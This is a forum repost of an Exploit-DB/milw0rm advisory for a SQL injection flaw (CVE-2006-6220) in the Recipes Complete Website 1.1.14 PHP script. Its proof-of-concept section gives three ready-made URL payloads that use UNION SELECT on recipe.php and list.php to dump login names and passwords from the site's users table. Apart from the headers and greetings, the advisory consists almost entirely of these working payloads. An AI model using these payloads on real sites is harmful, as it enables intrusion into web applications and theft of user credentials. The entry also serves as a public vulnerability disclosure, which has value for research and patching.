Exploit Recipes Complete Website 1.1.14 - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2834
Проверка EDB
  1. Пройдено
Автор
GREGSTAR
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-6220
Дата публикации
2006-11-23
Код:
*************************************************************************************************************************#
                                                              					          		 #
			               			 Coding 4 Fun     						 #	
			                                      						  		 #
*************************************************************************************************************************#
													  		 #
* Recipes Complete Website 1.1.14  (http://www.easysitenetwork.com/modules.php?name=Content&pa=showpage&pid=2) ; 	 #
													  		 #	
* Class = SQL Injection ;										  		 #
   													  		 #
* Download = http://www.easysitenetwork.com/modules.php?name=Downloads&d_op=getit&lid=3 ;				 #
													  		 #
* Found by = GregStar (gregstar[at]c4f[dot]pl) (http://c4f.pl) ;				          		 #
												  	  		 #
-------------------------------------------------------------------------------------------------------------------------#
													  		 #
													  		 #
- PoC:												          		 #
													  		 #
http://[target]/[path]/recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/* 		 #
															 #
-------------------------------------------------------------------------------------------------------------------------#
http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,login,0,0%20FROM%20users%20/*  - login      #											  
													  		 #
-------------------------------------------------------------------------------------------------------------------------#
http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,password,0,0%20FROM%20users%20/* - password #
															 #
*************************************************************************************************************************#													  				
Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n,java,reyw,kw@ch.	  		 #
												          		 #
*************************************************************************************************************************#

# milw0rm.com [2006-11-23]
 
Источник
www.exploit-db.com

Похожие темы